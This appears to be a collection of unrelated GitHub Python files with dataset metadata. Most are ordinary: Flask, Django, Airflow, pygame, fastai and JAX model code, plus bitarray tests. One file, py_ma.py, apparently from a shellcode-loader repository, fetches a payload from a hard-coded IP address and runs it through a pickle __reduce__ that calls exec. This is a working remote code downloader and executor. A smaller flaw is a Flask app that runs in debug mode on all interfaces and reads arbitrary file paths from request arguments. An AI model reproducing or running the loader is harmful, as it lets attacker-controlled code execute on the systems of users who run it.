| masoudrahimi39/Big-Data-Hands-On-Projects | NoSQL Databases (Cassandra, MongoDB, Neo4j, Elasticsearch)/MongoDB/1000 twiits/game5_1.py | game5_1.py | py | 674 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pymongo.DESCENDING",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "time.time",
... |
23760421272 | import os
import cv2
import numpy as np
from flask import Flask, request, jsonify
from src.preprocessing import segment_image, match_template
app = Flask(__name__)


@app.route("/", methods=["GET"])
def test():
    """Health-check endpoint."""
    return "API Working"
@app.route("/match", methods=["GET"])
def similar_template():
test_image_path = request.args["image_path"]
TEMPLATE_DIR = request.args["template_folder_path"]
template_image_file = [
os.path.join(TEMPLATE_DIR, item) for item in os.listdir(TEMPLATE_DIR)
]
image_segment = segment_image(test_image_path).compute()
template_score = []
template_name = []
for template_image in template_image_file:
template = cv2.imread(template_image)
gray_image = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
cumul_point = 0
for segment in image_segment:
cumul_point = cumul_point + match_template(
segment,
gray_image).compute()
template_score.append(cumul_point)
template_name.append(template_image)
output = {
"input_filename": test_image_path,
"template_file_name": template_name[np.argmax(template_score)],
}
return jsonify(output)
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=5000)
| sharmaanix/Template_similarity | main.py | main.py | py | 1,297 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.request.args",... |
32951669757 | from django.urls import include, path
from rest_framework.authtoken import views
from rest_framework.routers import DefaultRouter
from api.views import (CreateUserView, FollowViewSet, IngredientViewSet,
RecipeViewSet, TagViewSet)
app_name = 'api'

# DRF router generating the standard routes for each registered viewset.
router_v1 = DefaultRouter()
router_v1.register('users', CreateUserView, basename='users')
router_v1.register('tags', TagViewSet, basename='tags')
router_v1.register('recipes', RecipeViewSet, basename='recipes')
router_v1.register('ingredients', IngredientViewSet, basename='ingredients')

urlpatterns = [
    # Subscription endpoints are declared before the router include so they
    # are matched ahead of the routed `users` detail views.
    path('users/<users_id>/subscribe/',
         FollowViewSet.as_view({'post': 'create',
                                'delete': 'delete'}), name='subscribe'),
    path('users/subscriptions/',
         FollowViewSet.as_view({'get': 'list'}), name='subscriptions'),
    path('', include(router_v1.urls)),
    path('auth/', include('djoser.urls.authtoken')),
    path('api-token-auth/', views.obtain_auth_token),
]
| IvanGolenko/foodgram-project-react | backend/api/urls.py | urls.py | py | 994 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "api.views.CreateUserView",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "api.views.TagViewSet",
"line_number": 12,
"usage_type": "argument"
},... |
71121036264 | from django.contrib import admin
from django.urls import path,include
from .views import Login_View,Register_Voew,logout_view,Info_Profile,Info_Reply
app_name = 'user'

# Authentication and profile routes for the user app.
urlpatterns = [
    path('login/', Login_View.as_view(), name='login'),
    path('register/', Register_Voew.as_view(), name='register'),
    path('logout/', logout_view, name='logout'),
    path('user/<str:username1>/', Info_Profile.as_view(), name='infoprofile'),
    path('reply/<str:username1>/', Info_Reply.as_view(), name='inforeply'),
]
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.Login_View.as_view",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.Login_View",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.urls.p... |
17115671884 | from typing import Sequence, Callable, Union
import jax.numpy as jnp
from flax import linen as nn
from jax import jit, vmap, value_and_grad
from mbse.utils.network_utils import MLP
import jax
from mbse.utils.utils import gaussian_log_likelihood, rbf_kernel
import optax
from jax.scipy.stats import norm
EPS = 1e-6  # numerical floor to keep log() arguments strictly positive
def _predict(apply_fn, params, x, sig_max, sig_min, rng=None, deterministic=False):
forward = jax.vmap(apply_fn, (0, None))
predictions = forward(params, x)
mu, sig = jnp.split(predictions, 2, axis=-1)
sig = nn.softplus(sig)
sig = jnp.clip(sig, 0, sig_max) + sig_min
eps = jnp.ones_like(sig) * sig_min
sig = (1 - deterministic) * sig + deterministic * eps
predictions = jnp.concatenate([mu, sig], axis=-1)
return predictions
class ProbabilisticEnsembleModel(object):
    """Deep ensemble of Gaussian-output MLPs trained by max log-likelihood.

    Each member predicts a mean and a softplus-transformed standard
    deviation (see module-level ``_predict``). ``calculate_calibration_alpha``
    fits a per-output scaling of the epistemic std so that the predictive
    CDFs are calibrated on held-out data.
    """

    def __init__(
            self,
            example_input: jnp.ndarray,
            num_ensemble: int = 10,
            # NOTE(review): mutable default list; read-only here, but a
            # tuple default would be safer.
            features: Sequence[int] = [256, 256],
            output_dim: int = 1,
            non_linearity: Callable = nn.swish,
            lr: float = 1e-3,
            weight_decay: float = 1e-4,
            seed: int = 0,
            sig_min: float = 1e-3,
            sig_max: float = 1e3,
            deterministic: bool = False,
            initialize_train_fn: bool = True,
    ):
        """Build the ensemble, its optimizer state and jitted helpers.

        :param example_input: sample input used to initialize parameters
        :param num_ensemble: number of independently initialized members
        :param features: hidden layer widths of each member MLP
        :param output_dim: dimensionality of the predicted mean/std
        :param initialize_train_fn: subclasses (e.g. FSVGD) pass False and
            install their own jitted train step instead
        """
        self.output_dim = output_dim
        # Each member outputs 2 * output_dim values: mean and raw std.
        self.mlp = MLP(
            features=features,
            output_dim=2 * output_dim,
            non_linearity=non_linearity
        )
        self.num_ensembles = num_ensemble
        # vmap init function with respect to seed sequence
        init = vmap(self.mlp.init, (0, None))
        self.net = self.mlp.apply
        self.rng = jax.random.PRNGKey(seed)
        seed_sequence = jax.random.split(self.rng, self.num_ensembles + 1)
        self.rng = seed_sequence[0]
        seed_sequence = seed_sequence[1:]
        # "particles": stacked parameter pytrees, one leaf row per member.
        particles = init(seed_sequence, example_input)
        self.sig_min = sig_min
        self.sig_max = sig_max
        self.optimizer = optax.adamw(learning_rate=lr,
                                     weight_decay=weight_decay)
        optimizer_state = self.optimizer.init(particles)
        self.particles = particles
        self.opt_state = optimizer_state
        # Initial copies kept around for possible resets by callers.
        self.init_particles = particles
        self.init_opt_state = optimizer_state
        self.example_input = example_input
        # Jitted closure over the module-level _predict helper.
        self._predict = jit(lambda params, x:
                            _predict(
                                apply_fn=self.net,
                                params=params,
                                x=x,
                                sig_max=self.sig_max,
                                sig_min=self.sig_min,
                                deterministic=deterministic,
                            )
                            )
        # Number of probability levels used for calibration.
        self.num_ps = 10
        if initialize_train_fn:
            self._train_step = jit(lambda params, opt_state, x, y: self._train_fn(
                predict_fn=self._predict,
                update_fn=self.optimizer.update,
                params=params,
                opt_state=opt_state,
                x=x,
                y=y,
            ))

        def calculate_calibration_score(params, xs, ys, ps, alpha):
            return self._calculate_calibration_score(
                predict_fn=self._predict,
                params=params,
                xs=xs,
                ys=ys,
                ps=ps,
                alpha=alpha,
                output_dim=self.output_dim,
            )

        self.calculate_calibration_score_fn = calculate_calibration_score

        def calibration_errors(params, xs, ys, ps, alpha):
            return self._calibration_errors(
                calibration_score_fn=self.calculate_calibration_score_fn,
                params=params,
                xs=xs,
                ys=ys,
                ps=ps,
                alpha=alpha,
                output_dim=self.output_dim,
            )

        self.calibration_errors = calibration_errors

        def calculate_calibration_alpha(params, xs, ys):
            return self._calculate_calibration_alpha(
                calibration_error_fn=self.calibration_errors,
                params=params,
                xs=xs,
                ys=ys,
                num_ps=self.num_ps,
                output_dim=self.output_dim,
            )

        self.calculate_calibration_alpha = jax.jit(calculate_calibration_alpha)

    @property
    def params(self):
        """Current ensemble parameters (alias for ``self.particles``)."""
        return self.particles

    def predict(self, x):
        """Jitted ensemble prediction for input *x*: concatenated [mu, sig]."""
        return self._predict(self.particles, x)

    @staticmethod
    def _train_fn(predict_fn, update_fn, params, opt_state, x, y, prior_particles=None):
        """One NLL gradient step; returns new params/opt state, loss, grad norm.

        ``prior_particles`` is unused here; the parameter exists so
        subclasses can share the signature.
        """
        # Likelihood vmapped over the ensemble axis of (mu, sig).
        likelihood = jax.vmap(gaussian_log_likelihood, in_axes=(None, 0, 0), out_axes=0)

        def likelihood_loss(model_params):
            predictions = predict_fn(model_params, x)
            mu, sig = jnp.split(predictions, 2, axis=-1)
            logl = likelihood(y, mu, sig)
            return -logl.mean()

        # vmap over ensemble
        loss, grads = value_and_grad(likelihood_loss)(params)
        updates, new_opt_state = update_fn(grads,
                                           opt_state,
                                           params=params)
        new_params = optax.apply_updates(params, updates)
        grad_norm = optax.global_norm(grads)
        return new_params, new_opt_state, loss, grad_norm

    def train_step(self, x, y):
        """Run one jitted training step in place; return (loss, grad_norm)."""
        new_params, new_opt_state, loss, grad_norm = self._train_step(
            params=self.particles,
            opt_state=self.opt_state,
            x=x,
            y=y
        )
        self.particles = new_params
        self.opt_state = new_opt_state
        return loss, grad_norm

    @staticmethod
    def _calculate_calibration_alpha(calibration_error_fn, params, xs, ys, num_ps, output_dim) -> jax.Array:
        """Grid-search the epistemic-std scaling alpha minimizing calibration error."""
        # We flip so that we rather take more uncertainty model than less
        ps = jnp.linspace(0, 1, num_ps + 1)[1:]
        test_alpha = jnp.flip(jnp.linspace(0, 10, 100)[1:])
        test_alphas = jnp.repeat(test_alpha[..., jnp.newaxis], repeats=output_dim, axis=1)
        errors = vmap(calibration_error_fn, in_axes=(None, None, None, None, 0))(
            params, xs, ys, ps, test_alphas)
        # Per-output argmin over the alpha grid.
        indices = jnp.argmin(errors, axis=0)
        best_alpha = test_alpha[indices]
        assert best_alpha.shape == (output_dim,)
        return best_alpha, jnp.diag(errors[indices])

    @staticmethod
    def _calibration_errors(calibration_score_fn, params, xs, ys, ps, alpha, output_dim) -> jax.Array:
        """Mean squared gap between nominal levels ps and empirical coverage."""
        ps_hat = calibration_score_fn(params, xs, ys, ps, alpha)
        ps = jnp.repeat(ps[..., jnp.newaxis], repeats=output_dim, axis=1)
        return jnp.mean((ps - ps_hat) ** 2, axis=0)

    @staticmethod
    def _calculate_calibration_score(predict_fn, params, xs, ys, ps, alpha, output_dim):
        """Empirical coverage: fraction of ys whose predictive CDF is <= each p."""
        assert alpha.shape == (output_dim,)

        def calculate_score(x, y):
            predictions = predict_fn(params, x)
            mean, std = jnp.split(predictions, 2, axis=-1)
            # Epistemic std from member-mean disagreement; aleatoric from
            # the RMS of the members' predicted stds.
            mu = jnp.mean(mean, axis=0)
            eps_std = jnp.std(mean, axis=0)
            al_uncertainty = jnp.sqrt(jnp.mean(jnp.square(std), axis=0))
            cdfs = vmap(norm.cdf)(y, mu, eps_std * alpha + al_uncertainty)

            def check_cdf(cdf):
                assert cdf.shape == ()
                return cdf <= ps

            return vmap(check_cdf, out_axes=1)(cdfs)

        cdfs = vmap(calculate_score)(xs, ys)
        return jnp.mean(cdfs, axis=0)
class FSVGDEnsemble(ProbabilisticEnsembleModel):
def __init__(self,
n_prior_particles: Union[int, None] = None,
prior_bandwidth: float = None,
k_bandwidth: float = 0.1,
initialize_train_fn: bool = True,
*args, **kwargs):
super(FSVGDEnsemble, self).__init__(*args, **kwargs, initialize_train_fn=False)
n_prior_particles = n_prior_particles or self.num_ensembles
init = vmap(self.mlp.init, (0, None))
seed_sequence = jax.random.split(self.rng, n_prior_particles + 1)
self.rng = seed_sequence[0]
seed_sequence = seed_sequence[1:]
self.priors = init(seed_sequence, self.example_input)
self.prior_bandwidth = prior_bandwidth
self.k_bandwidth = k_bandwidth
if initialize_train_fn:
def train_step(
params,
opt_state,
x,
y,
prior_particles,
rng,
):
return self._train_fn(predict_fn=self._predict,
update_fn=self.optimizer.update,
params=params,
opt_state=opt_state,
x=x,
y=y,
prior_particles=prior_particles,
rng=rng,
prior_bandwidth=self.prior_bandwidth,
k_bandwidth=self.k_bandwidth,
)
self._train_step = jit(train_step)
def _prior(self, prior_particles, x):
predictions = self._predict(prior_particles, x)
altered_predictions = predictions
altered_predictions = altered_predictions.at[..., self.output_dim:].set(
jnp.log(altered_predictions[..., self.output_dim:] + EPS))
var = jax.vmap(lambda x: jnp.cov(x, rowvar=False),
in_axes=-1,
out_axes=-1)(altered_predictions)
mean = jnp.mean(altered_predictions, axis=0)
return mean, var
@staticmethod
def _train_fn(
predict_fn,
update_fn,
params,
opt_state,
x,
y,
prior_particles,
rng,
prior_bandwidth,
k_bandwidth
):
# mean_prior, k_prior = self._prior(prior_particles, x)
rbf = lambda z, v: rbf_kernel(z, v, bandwidth=prior_bandwidth)
kernel = lambda x: rbf(x, x) # K(x, x)
k_prior = kernel(x)
k_prior = jnp.stack([k_prior, k_prior], axis=-1)
k_rbf = lambda z, v: rbf_kernel(z, v, bandwidth=k_bandwidth)
def fsvgdloss(model_params):
predictions, pred_vjp = jax.vjp(lambda p: predict_fn(p, x), model_params)
k_pred, k_pred_vjp = jax.vjp(
lambda x: k_rbf(x, predictions), predictions)
grad_k = k_pred_vjp(-jnp.ones(k_pred.shape))[0]
def neg_log_post(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_post = gaussian_log_likelihood(y, mean_pred, std_pred)
return -log_post.mean()
likelihood = lambda x, cov_x: \
jax.scipy.stats.multivariate_normal.logpdf(x,
mean=jnp.zeros(x.shape[0]),
cov=cov_x + 1e-4 * jnp.eye(x.shape[0]))
likelihood = jax.vmap(likelihood, in_axes=-1, out_axes=-1)
def neg_log_prior(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_sigma = jnp.log(std_pred + EPS)
altered_predictions = jnp.stack([mean_pred, log_sigma], axis=-1)
log_prior = likelihood(altered_predictions, k_prior)
return -log_prior.mean() / mean_pred.shape[-2]
def neg_total_likelihood(predictions):
log_post = neg_log_post(predictions)
log_pior = neg_log_prior(predictions)
return log_post + log_pior
log_post, log_posterior_grad = jax.vmap(value_and_grad(neg_total_likelihood, 0))(predictions)
stein_grad = (jnp.einsum('ij,jkm', k_pred, log_posterior_grad)
+ grad_k)
grad = pred_vjp(stein_grad)[0]
return log_post.mean(), grad
loss, grads = fsvgdloss(params)
updates, new_opt_state = update_fn(grads,
opt_state,
params=params)
new_params = optax.apply_updates(params, updates)
grad_norm = optax.global_norm(grads)
return new_params, new_opt_state, loss, grad_norm
def train_step(self, x, y):
self.rng, train_rng = jax.random.split(self.rng)
new_params, new_opt_state, log_post, grad_norm = self._train_step(
params=self.particles,
opt_state=self.opt_state,
x=x,
y=y,
prior_particles=self.priors,
rng=train_rng
)
self.particles = new_params
self.opt_state = new_opt_state
return log_post, grad_norm
class KDEfWGDEnsemble(FSVGDEnsemble):
def __init__(self, *args, **kwargs):
super(KDEfWGDEnsemble, self).__init__(initialize_train_fn=True,
*args,
**kwargs)
@staticmethod
def _train_fn(
predict_fn,
update_fn,
params,
opt_state,
x,
y,
prior_particles,
rng,
prior_bandwidth,
k_bandwidth
):
# mean_prior, k_prior = self._prior(prior_particles, x)
rbf = lambda z, v: rbf_kernel(z, v, bandwidth=prior_bandwidth)
kernel = lambda x: rbf(x, x) # K(x, x)
k_prior = kernel(x)
k_prior = jnp.stack([k_prior, k_prior], axis=-1)
k_rbf = lambda z, v: rbf_kernel(z, v, bandwidth=k_bandwidth)
def kdeloss(model_params):
predictions, pred_vjp = jax.vjp(lambda p: predict_fn(p, x), model_params)
k_pred, k_pred_vjp = jax.vjp(
lambda x: k_rbf(x, predictions), predictions)
grad_k = k_pred_vjp(-jnp.ones(k_pred.shape))[0]
def neg_log_post(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_post = gaussian_log_likelihood(y, mean_pred, std_pred)
return -log_post.mean()
likelihood = lambda x, cov_x: \
jax.scipy.stats.multivariate_normal.logpdf(x,
mean=jnp.zeros(x.shape[0]),
cov=cov_x + 1e-4 * jnp.eye(x.shape[0]))
likelihood = jax.vmap(likelihood, in_axes=-1, out_axes=-1)
def neg_log_prior(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_sigma = jnp.log(std_pred + EPS)
altered_predictions = jnp.stack([mean_pred, log_sigma], axis=-1)
log_prior = likelihood(altered_predictions, k_prior)
return -log_prior.mean() / mean_pred.shape[-2]
def neg_total_likelihood(predictions):
log_post = neg_log_post(predictions)
log_pior = neg_log_prior(predictions)
return log_post + log_pior
log_post, log_posterior_grad = jax.vmap(value_and_grad(neg_total_likelihood, 0))(predictions)
k_i = jnp.sum(k_pred, axis=1)
stein_grad = log_posterior_grad + jax.vmap(lambda x, y: x / y)(grad_k, k_i)
# stein_grad = (jnp.einsum('ij,jkm', k_pred, log_posterior_grad)
# + grad_k)
grad = pred_vjp(stein_grad)[0]
return log_post.mean(), grad
loss, grads = kdeloss(params)
updates, new_opt_state = update_fn(grads,
opt_state,
params=params)
new_params = optax.apply_updates(params, updates)
grad_norm = optax.global_norm(grads)
return new_params, new_opt_state, loss, grad_norm
| bizoffermark/mbse | mbse/utils/models.py | models.py | py | 16,153 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jax.vmap",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "jax.numpy.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "jax.numpy",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flax.linen.softplus",
"line_nu... |
30351327302 | from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from dag_data_processing import DataProcessing
default_args = {
'owner': 'sychen',
'start_date': datetime(2022, 9, 13),
'retries': 0,
'catchup': False,
'retry_delay': timedelta(minutes=5),
'execution_date': '{execution_date}',
}
dag = DAG('convert_csv_to_parquet',
default_args=default_args,
schedule_interval='00 23 * * *',
)
start_read_data = PythonOperator(task_id='start_read_data',
python_callable=DataProcessing.print_parquet_massage,
dag=dag)
# etl bi
parquet_operator_ProductData = PythonOperator(
task_id='read_product_data',
python_callable=DataProcessing.convert_csv_to_parquet_product_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_SalesOrderData = PythonOperator(
task_id='read_sales_order_data',
python_callable=DataProcessing.convert_csv_to_parquet_sales_order_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_customer_address = PythonOperator(
task_id='read_customer_address',
python_callable=DataProcessing.convert_csv_to_parquet_customer_address,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_address_data = PythonOperator(
task_id='read_address_data',
python_callable=DataProcessing.convert_csv_to_parquet_address_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
python_operator_processing = PythonOperator(task_id='start_data_processing',
python_callable=DataProcessing.print_data_processing_massage,
dag=dag)
operator_sales_profit_diff_cities = PythonOperator(
task_id='sales_profit_diff_cities',
python_callable=DataProcessing.sales_profit_diff_cities,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
operator_total_profit_top10 = PythonOperator(
task_id='total_profit_top10',
python_callable=DataProcessing.total_profit_top10,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
operator_Longest_time_span = PythonOperator(
task_id='Longest_time_span',
python_callable=DataProcessing.Longest_time_span,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
start_read_data >> [parquet_operator_ProductData, parquet_operator_SalesOrderData,
parquet_operator_customer_address,
parquet_operator_address_data] >> python_operator_processing >> [
operator_sales_profit_diff_cities, operator_total_profit_top10, operator_Longest_time_span]
| sychen-tw/airflow_assignment | dag_parquet.py | dag_parquet.py | py | 3,732 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "airflow.DAG",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "airflow.operators.pyt... |
7349826010 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import inspect
import os
from openstack_dashboard.test.integration_tests import config
import testtools
def _is_test_method_name(method):
return method.startswith('test_')
def _is_test_fixture(method):
return method in ['setUp', 'tearDown']
def _is_test_cls(cls):
return cls.__name__.startswith('Test')
def _mark_method_skipped(meth, reason):
"""Mark method as skipped by replacing the actual method with wrapper
that raises the testtools.testcase.TestSkipped exception.
"""
@functools.wraps(meth)
def wrapper(*args, **kwargs):
raise testtools.testcase.TestSkipped(reason)
return wrapper
def _mark_class_skipped(cls, reason):
"""Mark every test method of the class as skipped."""
tests = [attr for attr in dir(cls) if _is_test_method_name(attr) or
_is_test_fixture(attr)]
for test in tests:
method = getattr(cls, test)
if callable(method):
setattr(cls, test, _mark_method_skipped(method, reason))
return cls
NOT_TEST_OBJECT_ERROR_MSG = "Decorator can be applied only on test" \
" classes and test methods."
def services_required(*req_services):
"""Decorator for marking test's service requirements,
if requirements are not met in the configuration file
test is marked as skipped.
Usage:
from openstack_dashboard.test.integration_tests.tests import decorators
@decorators.services_required("sahara")
class TestLogin(helpers.BaseTestCase):
.
.
.
from openstack_dashboard.test.integration_tests.tests import decorators
class TestLogin(helpers.BaseTestCase):
@decorators.services_required("sahara")
def test_login(self):
login_pg = loginpage.LoginPage(self.driver, self.conf)
.
.
.
"""
def actual_decoration(obj):
# make sure that we can decorate method and classes as well
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_method_skipped
# get available services from configuration
avail_services = config.get_config().service_available
for req_service in req_services:
if not getattr(avail_services, req_service, False):
obj = skip_method(obj, "%s service is required for this test"
" to work properly." % req_service)
break
return obj
return actual_decoration
def skip_because(**kwargs):
"""Decorator for skipping tests hitting known bugs
Usage:
from openstack_dashboard.test.integration_tests.tests import decorators
class TestDashboardHelp(helpers.TestCase):
@decorators.skip_because(bugs=["1234567"])
def test_dashboard_help_redirection(self):
.
.
.
"""
def actual_decoration(obj):
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_method_skipped
bugs = kwargs.get("bugs")
if bugs and isinstance(bugs, collections.Iterable):
for bug in bugs:
if not bug.isdigit():
raise ValueError("bug must be a valid bug number")
obj = skip_method(obj, "Skipped until Bugs: %s are resolved." %
", ".join([bug for bug in bugs]))
return obj
return actual_decoration
def skip_new_design(obj):
if not os.environ.get('SKIP_NEW_DESIGN'):
return obj
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip = _mark_method_skipped
return skip(obj, "New design isn't supported")
| Mirantis/mos-horizon | openstack_dashboard/test/integration_tests/decorators.py | decorators.py | py | 4,977 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "testtools.testcase.TestSkipped",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "testtools.testcase",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "functools.wraps",
"line_number": 40,
"usage_type": "call"
},
{
"api_name":... |
23517490061 | #-*- coding : utf-8-*-
#coding:unicode_escape
import pickle
import ctypes,urllib.request,codecs,base64
sectr = urllib.request.urlopen('http://1.15.134.154:8088/loader.txt').read()
#sectr=str(sectr,'UTF-8')
#print(sectr)
#sectr = base64.b64decode(sectr).decode("utf-8")
class A(object):
def __reduce__(self):
return (exec, (sectr,))
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode) | God-mellon/test2 | python-shellcode和加载器(pyminifier混淆)/py_ma.py | py_ma.py | py | 469 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 5,
"usage_type": "name"
},
{
"api_name":... |
72348330343 | import pygame
from random import randint
from constants import *
class Ball:
def __init__(self, x, y):
self.x = x
self.y = y
self.RADIUS = 14
self.SPEED = 3
self.x_velocity = self.SPEED
self.y_velocity = randint(-self.SPEED, self.SPEED)
def get_pos(self):
return (self.x, self.y)
def get_rect(self):
return pygame.Rect(self.x - self.RADIUS/2, self.y- self.RADIUS/2, self.RADIUS, self.RADIUS)
def reset(self):
self.x = WINDOW_WIDTH / 2
self.y = WINDOW_HEIGHT / 2
self.x_velocity = self.SPEED
self.y_velocity = randint(-self.SPEED, self.SPEED)
def draw(self, win):
pygame.draw.circle(win, WHITE, self.get_pos(), self.RADIUS)
def check_collision(self, paddles: list):
for paddle in paddles:
if self.get_rect().colliderect(paddle.get_rect()):
delta_y = (paddle.y + paddle.HEIGHT/2) - self.y
self.y_velocity = delta_y * -0.15
self.x_velocity *= -1
return True
return False
def move(self):
if (self.x <= 0) or (self.x + self.RADIUS >= WINDOW_WIDTH):
self.reset()
if (self.y - self.RADIUS <= 0) or (self.y + self.RADIUS >= WINDOW_HEIGHT):
self.y_velocity *= -1
self.y += self.y_velocity
self.x += self.x_velocity
| goncaloinunes/pong-sockets | ball.py | ball.py | py | 1,424 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pygame.Rect",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pygame.draw.circle",
"l... |
30592921741 | print('Loading libs...')
import numpy as np
import torch
import cv2
from fastai.transforms import *
# the base model of the model we are using
# only necessay for defining the transforms
# can also be skipped but then transforms should be defined explicitly
from fastai.model import resnet34
sz=256 # size of image
print('Loading model...')
model = torch.load('models4deploy/hotdog.h5', map_location='cpu') # load model to cpu
model.eval() # turns model into prediction mode
tfms = tfms_from_model(resnet34, sz) # define transforms
print('running')
cap = cv2.VideoCapture(0) # initiate camera
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# change the channel order and make pixels in range 0-1
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)/255
proc = tfms[1](rgb) # send image through transforms
# create a flipped copy of the image, because bug is causing the model to fail when sending a single image
proc = np.stack([proc, proc[:,:,::-1]])
proc_V = V(T(proc)) # Turn the array into a torch tensor
preds = model(proc_V) # get prediction
prob = np.exp(np.mean(to_np(preds)[:,1])) # turn into mean probability
# make decision
if prob > 0.5: label = 'Not Hot Dog'
else: label = 'Hot Dog'
# flip image horizontally to give mirror effect when displaying image
rgb = (rgb[:,::-1,::-1] * 255).astype('uint8')
# Display the resulting frame with label
cv2.putText(rgb, label, (10,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,255), 3)
cv2.imshow('frame', rgb)
if cv2.waitKey(1) & 0xFF == ord('q'): # stop program when "Q" is pressed
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| cortexlogic/aiExpo | demo.py | demo.py | py | 1,723 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "torch.load",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "fastai.model.resnet34",
"line_number": 18,
"usage_type": "argument"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
... |
30481418388 | """
Tests for bitarray
Author: Ilan Schnell
"""
import os
import sys
import unittest
import tempfile
import shutil
from random import randint
is_py3k = bool(sys.version_info[0] == 3)
# imports needed inside tests
import copy
import pickle
import itertools
try:
import shelve, hashlib
except ImportError:
shelve = hashlib = None
if is_py3k:
from io import StringIO
unicode = str
else:
from cStringIO import StringIO
from bitarray import (bitarray, frozenbitarray,
bitdiff, bits2bytes, _sysinfo, __version__)
tests = []
class Util(object):
@staticmethod
def randombitarrays(start=1):
for n in list(range(start, 25)) + [randint(1000, 2000)]:
a = bitarray(endian=['little', 'big'][randint(0, 1)])
a.frombytes(os.urandom(bits2bytes(n)))
del a[n:]
yield a
@staticmethod
def randomlists():
for n in list(range(25)) + [randint(1000, 2000)]:
yield [bool(randint(0, 1)) for d in range(n)]
